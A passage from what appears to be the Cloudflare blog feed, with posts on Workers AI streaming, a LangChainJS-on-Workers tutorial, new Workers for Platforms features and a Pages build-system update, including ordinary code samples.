            <p>If you want to consume the output event-stream from this Worker in a browser page, the client-side JavaScript is something like:</p>
            <pre><code>const source = new EventSource("/worker-endpoint");
source.onmessage = (event) =&gt; {
    if(event.data=="[DONE]") {
        // SSE spec says the connection is restarted
        // if we don't explicitly close it
        source.close();
        return;
    }
    const data = JSON.parse(event.data);
    el.innerHTML += data.response;
}</code></pre>
            <p>You can use this simple code with any simple HTML page, complex SPAs using React or other Web frameworks.</p><p>This creates a much more interactive experience for the user, who now sees the page update as the response is incrementally created, instead of waiting with a spinner until the entire response sequence has been generated. Try it out streaming on <a href="https://ai.cloudflare.com">ai.cloudflare.com</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6VIIO6crNIkpaz8hG9n8jg/c703ab696213d0fa814aff31d6d36d09/llama-streaming.gif" />
            
            </figure><p>Workers AI supports streaming text responses for the <a href="https://developers.cloudflare.com/workers-ai/models/llm/">Llama-2</a> model and any future LLM models we are adding to our catalog.</p><p>But this is not all.</p>
    <div>
      <h3>Higher precision, longer context and sequence lengths</h3>
      <a href="#higher-precision-longer-context-and-sequence-lengths">
        
      </a>
    </div>
    <p>Another top request we heard from our community after the launch of Workers AI was for longer questions and answers in our Llama-2 model. In LLM terminology, this translates to higher context length (the number of tokens the model takes as input before making the prediction) and higher sequence length (the number of tokens the model generates in the response.)</p><p>We’re listening, and in conjunction with streaming, today we are adding a higher 16-bit full-precision Llama-2 variant to the catalog, and increasing the context and sequence lengths for the existing 8-bit version.</p>
<table>
<thead>
  <tr>
    <th><span>Model</span></th>
    <th><span>Context length (in)</span></th>
    <th><span>Sequence length (out)</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>@cf/meta/llama-2-7b-chat-int8</span></td>
    <td><span>2048 (768 before)</span></td>
    <td><span>1800 (256 before)</span></td>
  </tr>
  <tr>
    <td><span>@cf/meta/llama-2-7b-chat-fp16</span></td>
    <td><span>3072</span></td>
    <td><span>2500</span></td>
  </tr>
</tbody>
</table><p>Streaming, higher precision, and longer context and sequence lengths provide a better user experience and enable new, richer applications using large language models in Workers AI.</p><p>Check the Workers AI <a href="https://developers.cloudflare.com/workers-ai">developer documentation</a> for more information and options. If you have any questions or feedback about Workers AI, please come see us in the <a href="https://community.cloudflare.com/">Cloudflare Community</a> and the <a href="https://discord.gg/cloudflaredev">Cloudflare Discord</a>.If you are interested in machine learning and serverless AI, the Cloudflare Workers AI team is building a global-scale platform and tools that enable our customers to run fast, low-latency inference tasks on top of our network. Check our <a href="https://www.cloudflare.com/careers/jobs/">jobs page</a> for opportunities.</p> ]]></content:encoded>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <guid isPermaLink="false">4RWvzttPkO6JoYsMwoovJ8</guid>
            <dc:creator>Jesse Kipp</dc:creator>
            <dc:creator>Celso Martinho</dc:creator>
        </item>
        <item>
            <title><![CDATA[Using LangChainJS and Cloudflare Workers together]]></title>
            <link>https://blog.cloudflare.com/langchain-and-cloudflare/</link>
            <pubDate>Thu, 18 May 2023 13:00:18 GMT</pubDate>
            <description><![CDATA[ We are incredibly stoked that our friends at LangChain have announced LangChainJS Support for Cloudflare Workers! In this post we'll show you how to build a sample application. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>We are incredibly stoked that our friends at LangChain have announced <a href="https://blog.langchain.dev/js-envs/">LangChainJS Support for Multiple JavaScript Environments (including Cloudflare Workers)</a>. During Developer Week 2023 we wanted to celebrate this launch and our future collaborations with LangChain.</p><blockquote><p><i>“Our goal for LangChain is to empower developers around the world to build with AI. We want LangChain to work wherever developers are building, and to spark their creativity to build new and innovative applications. With this new launch, we can't wait to see what developers build with LangChainJS and Cloudflare Workers. And we're excited to put more of Cloudflare's developer tools in the hands of our community in the coming months.” - </i><b><i>Harrison Chase</i></b><i>, Co-Founder and CEO, LangChain</i></p></blockquote><p>In this post, we’ll share why we’re so excited about LangChain and walk you through how to build your first LangChainJS + Cloudflare Workers application.</p><p>For the uninitiated, <a href="https://docs.langchain.com/docs/">LangChain</a> is a framework for building applications powered by <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">large language models (LLMs)</a>. It not only lets you fairly seamlessly switch between different LLMs, but also gives you the ability to chain prompts together. This allows you to build more sophisticated applications across multiple LLMs, something that would be way more complicated without the help of LangChain.</p>
    <div>
      <h3>Building your first LangChainJS + Cloudflare Workers application</h3>
      <a href="#building-your-first-langchainjs-cloudflare-workers-application">
        
      </a>
    </div>
    <p>There are a few prerequisites you have to set up in order to build this application:</p><ol><li><p>An OpenAI account: If you don’t already have one, you can <a href="https://platform.openai.com/signup">sign up for free</a>.</p></li><li><p>A paid Cloudflare Workers account: If you don’t already have an account, you can <a href="https://dash.cloudflare.com/sign-up">sign up here</a> and upgrade your Workers for $5 per month.</p></li><li><p>Node &amp; npm: If this is your first time working with node, you can <a href="https://nodejs.org/en/">get it here</a>.</p></li></ol><p>Next create a new folder called <code>langchain-workers</code>, navigate into that folder and then within that folder run <code>npm create cloudflare@latest</code>.</p><p>When you run <code>npm create cloudflare@latest</code> you’ll select the following options:</p><ul><li><p><b>Where do you want to create your application?</b> <i>langchain-worker</i></p></li><li><p><b><b><b>What type of application do you want to create?</b></b></b><b><b> </b></b><i><b><b>"Hello World" script</b></b></i></p></li><li><p><b><b><b>Do you want to use TypeScript</b></b></b><b><b> </b></b><i><b><b>No</b></b></i></p></li></ul><p><b>Do you want to deploy your application?</b> _No_With our Worker created, we’ll need to set up the environment variable for our OpenAI API Key. You can <a href="https://platform.openai.com/account/api-keys">create an API key in your OpenAI dashboard</a>. Save your new API key someplace safe, then we’ll use wrangler to safely and securely store our API key in an environment variable that our Worker can access:</p>
            <pre><code>npx wrangler secret put OPENAI_API_KEY</code></pre>
            <p>Then we’ll install LangChainjs using npm:</p>
            <pre><code>npm install langchain</code></pre>
            <p>Before we start writing code we can make sure everything is working properly by running <code>wrangler dev</code>. With <code>wrangler dev</code> running you can press <code>b</code> to open a browser. When you do, you'll see “Hello World!” in your browser.</p>
    <div>
      <h3>A sample application</h3>
      <a href="#a-sample-application">
        
      </a>
    </div>
    <p>One common way you may want to use a language model is to combine it with your own text. LangChain is a great tool to accomplish this goal and that’s what we’ll be doing today in our sample application. We’re going to build an application that lets us use the OpenAI language model to ask a question about an article on Wikipedia. Because I live in (and love) Brooklyn, we’ll be using the <a href="https://en.wikipedia.org/wiki/Brooklyn">Wikipedia article about Brooklyn</a>. But you can use this code for any Wikipedia article, or website, you’d like.</p><p>Because language models only know about the data that they were trained on, if we want to use a language model with new or specific information we need a way to pass a model that information. In LangChain we can accomplish this using a <a href="https://js.langchain.com/docs/modules/schema/document">”document”</a>. If you’re like me, when you hear “document” you often think of a specific file format but in LangChain a document is an object that consists of some text and optionally some metadata. The text in a document object is what will be used when interacting with a language model and the metadata is a way that you can track information about your document.</p><p>Most often you’ll want to create documents from a source of pre-existing text. LangChain helpfully provides us with different <a href="https://js.langchain.com/docs/modules/indexes/document_loaders/">document loaders</a> to make loading text from many different sources easy. There are document loaders for different types of text formats (for example: CSV, PDFs, HTML, unstructured text) and that content can be loaded locally or from the web. A document loader will both retrieve the text for you and load that text into a document object. For our application, we’ll be using the <a href="https://js.langchain.com/docs/modules/indexes/document_loaders/examples/web_loaders/web_cheerio">webpages with Cheerio</a> document loader. <a href="https://cheerio.js.org/">Cheerio</a> is a lightweight library that will let us read the content of a webpage. We can install it using <code>npm install cheerio</code>.</p><p>After we’ve installed cheerio we’ll import the CheerioWebBaseLoader at the top of our <code>src/index.js</code> file:</p>
            <pre><code>import { CheerioWebBaseLoader } from "langchain/document_loaders/web/cheerio";</code></pre>
            <p>With CheerioWebBaseLoader imported, we can start using it within our fetch function:.</p>
            <pre><code>    async fetch(request, env, ctx) {
        const loader = new CheerioWebBaseLoader(
          “https://en.wikipedia.org/wiki/Brooklyn"
        );
        const docs = await loader.load();
        console.log(docs);

        return new Response("Hello World!");
  },</code></pre>
            <p>In this code, we’re configuring our loader with the Wikipedia URL for the article about Brooklyn, run the <code>load()</code> function and log the result to the console. Like I mentioned earlier, if you want to try this with a different Wikipedia article or website, LangChain makes it very easy. All we have to do is change the URL we’re passing to our CheerioWebBaseLoader.</p><p>Let’s run <code>npx wrangler dev</code>, load up our page locally and watch the output in our console. You should see:</p>
            <pre><code>Loaded page
Array(1) [ Document ]</code></pre>
            <p>Our document loader retrieved the content of the webpage, put that content in a document object and loaded it into an array.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6eUEj1m3fLXaX22XfWzZc1/9b080aef6c13b4bd4db31c740b2998f1/image7-8.png" />
            
            </figure><p>This is great, but there’s one more improvement we can make to this code before we move on – splitting our text into multiple documents.</p><p>Many language models have limits on the amount of text you can pass to them. As well, some LLM APIs charge based on the amount of text you send in your request. For both of these reasons, it’s helpful to only pass the text you need in a request to a language model.</p><p>Currently, we’ve loaded the entire content of the Wikipedia page about Brooklyn into one document object and would send the entirety of that text with every request to our language model. It would be more efficient if we could only send the relevant text to our language model when we have a question. The first step in doing this is to split our text into smaller chunks that are stored in multiple document objects. To assist with this LangChain gives us the very aptly named <a href="https://js.langchain.com/docs/modules/indexes/text_splitters/">Text Splitters</a>.</p><p>We can use a text splitter by updating our loader to use the <code>loadAndSplit()</code> function instead of <code>load()</code>. Update the line where we assign docs to this:</p>
            <pre><code>const docs = await loader.loadAndSplit();</code></pre>
            <p>Now start the application again with <code>npx wrangler dev</code> and load our page. This time in our console you’ll see something like this:</p>
            <pre><code>Loaded page
Array(227) [ Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document... ]</code></pre>
            <p>Instead of an array with one document object, our document loader has now split the text it retrieved into multiple document objects. It’s still a single Wikipedia article, LangChain just split that text into chunks that would be more appropriately sized for working with a language model.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7qjMlbP8yfVegK2PT9BPm/31015f843d9a5dd7ad1d80f100da91f7/image3-18.png" />
            
            </figure><p>Even though our text is split into multiple documents, we still need to be able to understand what text is relevant to our question and should be sent to our language model. To do this, we’re going to introduce two new concepts – <a href="https://www.cloudflare.com/learning/ai/what-are-embeddings/">embeddings</a> and <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/">vector stores</a>.</p><p>Embeddings are a way of representing text with numerical data. For our application we’ll be using <a href="https://platform.openai.com/docs/guides/embeddings">OpenAI Embeddings</a> to generate our embeddings based on the document objects we just created. When you generate embeddings the result is a vector of floating point numbers. This makes it easier for computers to understand the relatedness of the strings of text to each other. For each document object we pass the embedding API, a vector will be created.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6WDcDosuQet5YbgNuU1ZQG/657e7684615f81785e69a4cb5fc03be9/image2-28.png" />
            
            </figure><p>When we compare vectors, the closer numbers are to each other the more related the strings are. Inversely, the further apart the numbers are then the less related the strings are. It can be helpful to visualize how these numbers would allow us to place each document in a virtual space:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bngW4Ms4zz7PZIAZxnR2F/31f66eabc1b8b6b7630fe8bff4ce80f7/image1-47.png" />
            
            </figure><p>In this illustration, you could imagine how the text in the document objects that are bunched together would be more similar than the document object further off. The grouped documents could be text pulled from the article’s section on the history of Brooklyn. It’s a longer section that would have been split into multiple documents by our text splitter. But even though the text was split the embeddings would allow us to know this content is closely related to each other. Meanwhile, the document further away could be the text on the climate of Brooklyn. This section was smaller, not split into multiple documents, and the current climate is not as related to the history of Brooklyn, so it’s placed further away.</p><p>Embeddings are a pretty fascinating and complicated topic. If you’re interested in understanding more, here's a <a href="https://www.youtube.com/watch?v=5MaWmXwxFNQ">great explainer video</a> that takes an in-depth look at the embeddings.</p><p>Once you’ve generated your documents and embeddings, you need to store them someplace for future querying. Vector stores are a kind of database optimized for storing &amp; querying documents and their embeddings. For our vector store, we’ll be using <a href="https://js.langchain.com/docs/modules/indexes/vector_stores/integrations/memory">MemoryVectorStore</a> which is an ephemeral in-memory vector store. LangChain also has support for many of your favorite vector databases like <a href="https://js.langchain.com/docs/modules/indexes/vector_stores/integrations/chroma">Chroma</a> and <a href="https://js.langchain.com/docs/modules/indexes/vector_stores/integrations/pinecone">Pinecone</a>.</p><p>We’ll start by adding imports for OpenAIEmbeddings and MemoryVectorStore at the top of our file:</p>
            <pre><code>import { OpenAIEmbeddings } from "langchain/embeddings/openai";
import { MemoryVectorStore } from "langchain/vectorstores/memory";</code></pre>
            <p>Then we can remove the <code>console.log()</code> function we had in place to show how our loader worked and replace them with the code to create our Embeddings and Vector store:</p>
            <pre><code>const store = await MemoryVectorStore.fromDocuments(docs, new OpenAIEmbeddings({ openAIApiKey: env.OPENAI_API_KEY}));</code></pre>
            <p>With our text loaded into documents, our embeddings created and both stored in a vector store we can now query our text with our language model. To do that we’re going to introduce the last two concepts that are core to building this application – <a href="https://js.langchain.com/docs/modules/models/">models</a> and <a href="https://js.langchain.com/docs/modules/chains/">chains</a>.</p><p>When you see models in LangChain, it’s not about generating or creating models. Instead, LangChain provides a standard interface that lets you access many different language models. In this app, we’ll be using the <a href="https://js.langchain.com/docs/modules/models/llms/integrations#openai">OpenAI model</a>.</p><p>Chains enable you to combine a language model with other sources of information, APIs, or even other language models. In our case, we’ll be using the <a href="https://js.langchain.com/docs/modules/chains/index_related_chains/retrieval_qa">RetreivalQAChain</a>. This chain retrieves the documents from our vector store related to a question and then uses our model to answer the question using that information.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17hBMkJMZe5P3UHUfdCmCl/db5da651d7f7c204a31d0729fe9f6c5d/image4-18.png" />
            
            </figure><p>To start, we’ll add these two imports to the top of our file:</p>
            <pre><code>import { OpenAI } from "langchain/llms/openai";
import { RetrievalQAChain } from "langchain/chains";</code></pre>
            <p>Then we can put this all into action by adding the following code after we create our vector store:</p>
            <pre><code>        const model = new OpenAI({ openAIApiKey: env.OPENAI_API_KEY});
        const chain = RetrievalQAChain.fromLLM(model, store.asRetriever());

        const question = "What is this article about? Can you give me 3 facts about it?";

        const res = await chain.call({
            query: question,
        });

        return new Response(res.text); </code></pre>
            <p>In this code the first line is where we instantiate our model interface and pass it our API key. Next we create a chain passing it our model and our vector store. As mentioned earlier, we’re using a RetrievalQAChain which will look in our vector store for documents related to our query and then use those documents to get an answer for our query from our model.</p><p>With our chain created, we can call the chain by passing in the query we want to ask. Finally, we send the response text we got from our chain as the response to the request our Worker received. This will allow us to see the response in our browser.</p><p>With all our code in place, let’s test it again by running <code>npx wrangler dev</code>. This time when you open your browser you will see a few facts about Brooklyn:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Eb3EUM6vGAZVPf1nlkxs/8169139105040b3ac58fa7171791775b/image6-9.png" />
            
            </figure><p>Right now, the question we’re asking is hard coded. Our goal was to be able to use LangChain to ask any question we want about this article. Let’s update our code to allow us to pass the question we want to ask in our request. In this case, we’ll pass a question as an argument in the query string (e.g. <i>?question=When was Brooklyn founded</i>). To do this we’ll replace the line we’re currently assigning our question with the code needed to pull a question from our query string:</p>
            <pre><code>        const { searchParams } = new URL(request.url);
        const question = searchParams.get('question') ?? "What is this article about? Can you give me 3 facts about it?";</code></pre>
            <p>This code pulls all the query parameters from our URL using a JavaScript URL’s native <a href="https://developer.mozilla.org/en-US/docs/Web/API/URL/searchParams">searchParams property</a>, and gets the value passed in for the “question” parameter. If a value isn’t present for the “question” parameter, we’ll use the default question text we were using previously thanks to <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Nullish_coalescing">JavaScripts’s nullish coalescing operator</a>.</p><p>With this update, run <code>npx wrangler dev</code> and this time visit your <a href="http://127.0.0.1:8787/?question=When%20was%20Brooklyn%20founded?">local url with a question query string added</a>. Now instead of giving us a few fun facts about Brooklyn, we get the answer of when Brooklyn was founded. You can try this with any question you may have about Brooklyn. Or you can switch out the URL in our document loader and try asking similar questions about different Wikipedia articles.</p><p>With our code working locally, we can deploy it with <code>npx wrangler publish</code>. After this command completes you’ll receive a Workers URL that runs your code.</p>
    <div>
      <h3>You + LangChain + Cloudflare Workers</h3>
      <a href="#you-langchain-cloudflare-workers">
        
      </a>
    </div>
    <p>You can find our full LangChain example application on <a href="https://github.com/rickyrobinett/langchainjs-workers">GitHub</a>. We can’t wait to see what you all build with LangChain and Cloudflare Workers. Join us on <a href="https://discord.com/invite/cloudflaredev">Discord</a> or tag us on <a href="https://www.twitter.com/cloudflaredev">Twitter</a> as you’re building. And if you’re ever having any trouble or questions, you can ask on <a href="https://community.cloudflare.com/">community.cloudflare.com</a>.</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div></div> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Serverless]]></category>
            <guid isPermaLink="false">3PgqHl1LP0y4eOryCewoYN</guid>
            <dc:creator>Ricky Robinett</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare is powering the next generation of platforms with Workers]]></title>
            <link>https://blog.cloudflare.com/powering-platforms-on-workers/</link>
            <pubDate>Thu, 18 May 2023 13:00:01 GMT</pubDate>
            <description><![CDATA[ Workers for Platforms is our Workers offering for customers building new platforms on Cloudflare Workers. Let’s take a look back and recap why we built Workers for Platforms, show you some of the most interesting problems our customers have been solving and share new features that are now available! ]]></description>
            <content:encoded><![CDATA[ <p></p><p>We launched Workers for Platforms, our Workers offering for SaaS businesses, almost exactly one year ago to the date! We’ve seen a wide array of customers using Workers for Platforms – from e-commerce to CMS, low-code/no-code platforms and also a new wave of AI businesses running tailored inference models for their end customers!</p><p>Let’s take a look back and recap why we built Workers for Platforms, show you some of the most interesting problems our customers have been solving and share new features that are now available!</p>
    <div>
      <h2>What is Workers for Platforms?</h2>
      <a href="#what-is-workers-for-platforms">
        
      </a>
    </div>
    <p>SaaS businesses are all too familiar with the never ending need to keep up with their users' feature requests. Thinking back, the introduction of Workers at Cloudflare was to solve this very pain point. Workers gave our customers the power to program our network to meet their specific requirements!</p><p>Need to implement complex load balancing across many origins? <i>Write a Worker.</i> Want a custom set of WAF rules for each region your business operates in? <i>Go crazy, write a Worker.</i></p><p>We heard the same themes coming up with our customers – which is why we partnered with early customers to build Workers for Platforms. We worked with the Shopify Oxygen team early on in their journey to create a built-in hosting platform for Hydrogen, their Remix-based eCommerce framework. Shopify’s Hydrogen/Oxygen combination gives their merchants the flexibility to build out personalized shopping for buyers. It’s an experience that storefront developers can make their own, and it’s powered by Cloudflare Workers behind the scenes. For more details, check out Shopify’s “<a href="https://shopify.engineering/how-we-built-oxygen">How we Built Oxygen</a>” blog post.</p><blockquote><p><i>Oxygen is Shopify's built-in hosting platform for Hydrogen storefronts, designed to provide users with a seamless experience in deploying and managing their ecommerce sites. Our integration with Workers for Platforms has been instrumental to our success in providing fast, globally-available, and secure storefronts for our merchants. The flexibility of Cloudflare's platform has allowed us to build delightful merchant experiences that integrate effortlessly with the best that the Shopify ecosystem has to offer.</i><i>-</i> <b>Lance Lafontaine</b>, Senior Developer <a href="https://shopify.dev/docs/custom-storefronts/oxygen">Shopify Oxygen</a></p></blockquote><p>Another customer that we’ve been working very closely with is Grafbase. Grafbase started out on the <a href="https://www.cloudflare.com/forstartups/?ref=blog.cloudflare.com">Cloudflare for Startups</a> program, building their company from the ground up on Workers. Grafbase gives their customers the ability to deploy serverless GraphQL backends instantly. On top of that, their developers can build custom GraphQL resolvers to program their own business logic right at the edge. Using Workers and Workers for Platforms means that Grafbase can focus their team on building Grafbase, rather than having to focus on building and architecting at the infrastructure layer.</p><blockquote><p><i>Our mission at Grafbase is to enable developers to deploy globally fast GraphQL APIs without worrying about complex infrastructure. We provide a unified data layer at the edge that accelerates development by providing a single endpoint for all your data sources. We needed a way to deploy serverless GraphQL gateways for our customers with fast performance globally without cold starts. We experimented with container-based workloads and FaaS solutions, but turned our attention to WebAssembly (Wasm) in order to achieve our performance targets. We chose Rust to build the Grafbase platform for its performance, type system, and its Wasm tooling. Cloudflare Workers was a natural fit for us given our decision to go with Wasm. On top of using Workers to build our platform, we also wanted to give customers the control and flexibility to deploy their own logic. Workers for Platforms gave us the ability to deploy customer code written in JavaScript/TypeScript or Wasm straight to the edge.</i><i>-</i> <b>Fredrik Björk</b>, Founder &amp; CEO at <a href="https://grafbase.com/">Grafbase</a></p></blockquote><p>Over the past year, it’s been incredible seeing the velocity that building on Workers allows companies both big and small to move at.</p>
    <div>
      <h2>New building blocks</h2>
      <a href="#new-building-blocks">
        
      </a>
    </div>
    <p>Workers for Platforms uses <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/learning/how-workers-for-platforms-works/#dynamic-dispatch-worker">Dynamic Dispatch</a> to give our customers, like Shopify and Grafbase, the ability to run their own Worker before user code that’s written by Shopify and Grafbase’s developers is executed. With Dynamic Dispatch, Workers for Platforms customers (referred to as platform customers) can authenticate requests, add context to a request or run any custom code before their developer’s Workers (referred to as user Workers) are called.</p><p>This is a key building block for Workers for Platforms, but we’ve also heard requests for even more levels of visibility and control from our platform customers. Delivering on this theme, we’re releasing three new highly requested features:</p>
    <div>
      <h3>Outbound Workers</h3>
      <a href="#outbound-workers">
        
      </a>
    </div>
    <p>Dynamic Dispatch gives platforms visibility into all incoming requests to their user’s Workers, but customers have also asked for visibility into all outgoing requests from their user’s Workers in order to do things like:</p><ul><li><p>Log all subrequests in order to identify malicious hosts or usage patterns</p></li><li><p>Create allow or block lists for hostnames requested by user Workers</p></li><li><p>Configure authentication to your APIs behind the scenes (without end developers needing to set credentials)</p></li></ul><p>Outbound Workers sit between user Workers and fetch() requests out to the Internet. User Workers will trigger a <a href="https://maddy-outbound-workers.cloudflare-docs-7ou.pages.dev/workers/runtime-apis/fetch-event/">FetchEvent</a> on the Outbound Worker and from there platform customers have full visibility over the request before it’s sent out.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/74ISEbqaIX58uc6z88wV0s/28a040fdb9e044b8420dbf7930bf27aa/image1-48.png" />
            
            </figure><p>It’s also important to have context in the Outbound Worker to answer questions like “which user Worker is this request coming from?”. You can declare variables to pass through to the Outbound Worker in the dispatch namespaces binding:</p>
            <pre><code>[[dispatch_namespaces]]
binding = "dispatcher"
namespace = "&lt;NAMESPACE_NAME&gt;"
outbound = {service = "&lt;SERVICE_NAME&gt;", parameters = [customer_name,url]}</code></pre>
            <p>From there, the variables declared in the binding can be accessed in the Outbound Worker through env. <code>&lt;VAR_NAME&gt;</code>.</p>
    <div>
      <h3>Custom Limits</h3>
      <a href="#custom-limits">
        
      </a>
    </div>
    <p>Workers are really powerful, but, as a platform, you may want guardrails around their capabilities to shape your pricing and packaging model. For example, if you run a freemium model on your platform, you may want to set a lower CPU time limit for customers on your free tier.</p><p>Custom Limits let you set usage caps for CPU time and number of subrequests on your customer’s Workers. Custom limits are set from within your dynamic dispatch Worker allowing them to be dynamically scripted. They can also be combined to set limits based on <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/platform/tags/">script tags</a>.</p><p>Here’s an example of a Dynamic Dispatch Worker that puts both Outbound Workers and Custom Limits together:</p>
            <pre><code>export default {
async fetch(request, env) {
  try {
    let workerName = new URL(request.url).host.split('.')[0];
    let userWorker = env.dispatcher.get(
      workerName,
      {},
      {// outbound arguments
       outbound: {
           customer_name: workerName,
           url: request.url},
        // set limits
       limits: {cpuMs: 10, subRequests: 5}
      }
    );
    return await userWorker.fetch(request);
  } catch (e) {
    if (e.message.startsWith('Worker not found')) {
      return new Response('', { status: 404 });
    }
    return new Response(e.message, { status: 500 });
  }
}
};</code></pre>
            <p>They’re both incredibly simple to configure, and the best part – the configuration is completely programmatic. You have the flexibility to build on both of these features with your own custom logic!</p>
    <div>
      <h3>Tail Workers</h3>
      <a href="#tail-workers">
        
      </a>
    </div>
    <p>Live logging is an essential piece of the developer experience. It allows developers to monitor for errors and troubleshoot in real time. On Workers, giving users real time logs though <code>wrangler tail</code> is a feature that developers love! Now with Tail Workers, platform customers can give their users the same level of visibility to provide a faster debugging experience.</p><p>Tail Worker logs contain metadata about the original trigger event (like the incoming URL and status code for fetches), console.log() messages and capture any unhandled exceptions. Tail Workers can be added to the Dynamic Dispatch Worker in order to capture logs from both the Dynamic Dispatch Worker and any User Workers that are called.</p><p>A Tail Worker can be configured by adding the following to the <code>wrangler.toml</code> file of the producing script</p>
            <pre><code>tail_consumers = [{service = "&lt;TAIL_WORKER_NAME&gt;", environment = "&lt;ENVIRONMENT_NAME&gt;"}]</code></pre>
            <p>From there, events are captured in the Tail Worker using a new tail handler:</p>
            <pre><code>export default {
  async tail(events) =&gt; {
    fetch("https://example.com/endpoint", {
      method: "POST",
      body: JSON.stringify(events),
    })
  }
}</code></pre>
            <p>Tail Workers are full-fledged Workers empowered by the usual Worker ecosystem. You can send events to any HTTP endpoint, like for example a logging service that parses the events and passes on real-time logs to customers.</p>
    <div>
      <h2>Try it out!</h2>
      <a href="#try-it-out">
        
      </a>
    </div>
    <p>All three of these features are now in open beta for users with access to Workers for Platforms. For more details and try them out for yourself, check out our developer documentation:</p><ul><li><p><a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/platform/outbound-workers/">Outbound Workers</a></p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/platform/custom-limits/">Custom Limits</a></p></li><li><p><a href="https://developers.cloudflare.com/workers/platform/tail-workers">Tail Workers</a></p></li></ul><p>Workers for Platforms is an enterprise only product (for now) but we’ve heard a lot of interest from developers. In the later half of the year, we’ll be bringing Workers for Platforms down to our pay as you go plan! In the meantime, if you’re itching to get started, reach out to us through the <a href="https://discord.cloudflare.com/">Cloudflare Developer Discord</a> (channel name: workers-for-platforms).</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div></div> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">6KYE0S5UOjVcVum73JwOp0</guid>
            <dc:creator>Nathan Disidore</dc:creator>
            <dc:creator>Tanushree Sharma</dc:creator>
        </item>
        <item>
            <title><![CDATA[Modernizing the toolbox for Cloudflare Pages builds]]></title>
            <link>https://blog.cloudflare.com/moderizing-cloudflare-pages-builds-toolbox/</link>
            <pubDate>Wed, 17 May 2023 13:00:37 GMT</pubDate>
            <description><![CDATA[ A new beta build system is now available for Cloudflare Pages. We've updated our default languages and tools, and made some exciting underlying architecture changes. You can enable it in your project settings in the dashboard today. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2lME1CWawsCQtIuzvvfLPq/b037a9c82151e6976cb0ed220573ad80/image2-22.png" />
            
            </figure><p>Cloudflare Pages <a href="/cloudflare-pages/">launched</a> over two years ago in December 2020, and since then, we have grown Pages to build millions of deployments for developers. In May 2022, to support developers with more complex requirements, we opened up Pages to empower developers to <a href="/cloudflare-pages-direct-uploads/">create deployments using their own build environments</a> — but that wasn't the end of our journey. Ultimately, we want to be able to allow anyone to use our build platform and take advantage of the git integration we offer. You should be able to connect your repository and have it <i>just work</i> on Cloudflare Pages.</p><p>Today, we're introducing a new beta version of our build system (a.k.a. "build image") which brings the default set of tools and languages up-to-date, and sets the stage for future improvements to builds on Cloudflare Pages. We now support the latest versions of Node.js, Python, Hugo and many more, putting you on the best path for any new projects that you undertake. Existing projects will continue to use the current build system, but this upgrade will be available to opt-in for everyone.</p>
    <div>
      <h2>New defaults, new possibilities</h2>
      <a href="#new-defaults-new-possibilities">
        
      </a>
    </div>
    <p>The Cloudflare Pages build system has been updated to not only support new versions of your favorite languages and tools, but to also include new versions by default. The versions of 2020 are no longer relevant for the majority of today's projects, and as such, we're bumping these to their more modern equivalents:</p><ul><li><p><b>Node.js</b>' default is being increased from 12.18.0 to 18.16.0,</p></li><li><p><b>Python</b> 2.7.18 and 3.10.5 are both now available by default,</p></li><li><p><b>Ruby</b>'s default is being increased from 2.7.1 to 3.2.2,</p></li><li><p><b>Yarn</b>'s default is being increased from 1.22.4 to 3.5.1,</p></li><li><p>And we're adding <b>pnpm</b> with a default version of 8.2.0.</p></li></ul><p>These are just some of the headlines — check out <a href="https://developers.cloudflare.com/pages/platform/language-support-and-tools/">our documentation</a> for the full list of changes.</p><p>We're aware that these new defaults constitute a breaking change for anyone using a project without pinning their versions with an environment variable or version file. That's why we're making this new build system opt-in for existing projects. You'll be able to stay on the existing system without breaking your builds. If you do decide to adventure with us, we make it easy to test out the new system in your preview environments before rolling out to production.</p>
            <figure>
            
